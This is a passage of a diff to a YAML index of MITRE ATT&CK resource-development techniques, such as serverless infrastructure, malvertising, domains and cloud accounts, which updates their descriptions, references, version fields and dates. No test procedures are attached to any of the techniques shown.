         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -52072,29 +52752,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -52118,15 +52797,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -52158,17 +52840,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -52221,11 +52902,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -52261,7 +52941,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -52310,43 +52990,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -52359,18 +53008,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -52392,7 +53072,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -52408,8 +53088,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -52431,7 +53109,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52451,8 +53129,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -52491,7 +53167,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52512,8 +53188,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -52543,7 +53217,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -52580,8 +53254,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -52603,7 +53275,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52625,8 +53297,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -52663,7 +53333,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -52685,8 +53355,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -52748,7 +53416,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -52770,7 +53437,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52788,8 +53455,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -52824,7 +53489,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52843,33 +53508,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -52879,10 +53542,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -52890,9 +53562,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -52943,11 +53614,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52960,7 +53630,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -52995,22 +53665,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -53031,7 +53704,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -53070,6 +53743,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -53125,7 +53802,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -53183,7 +53859,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
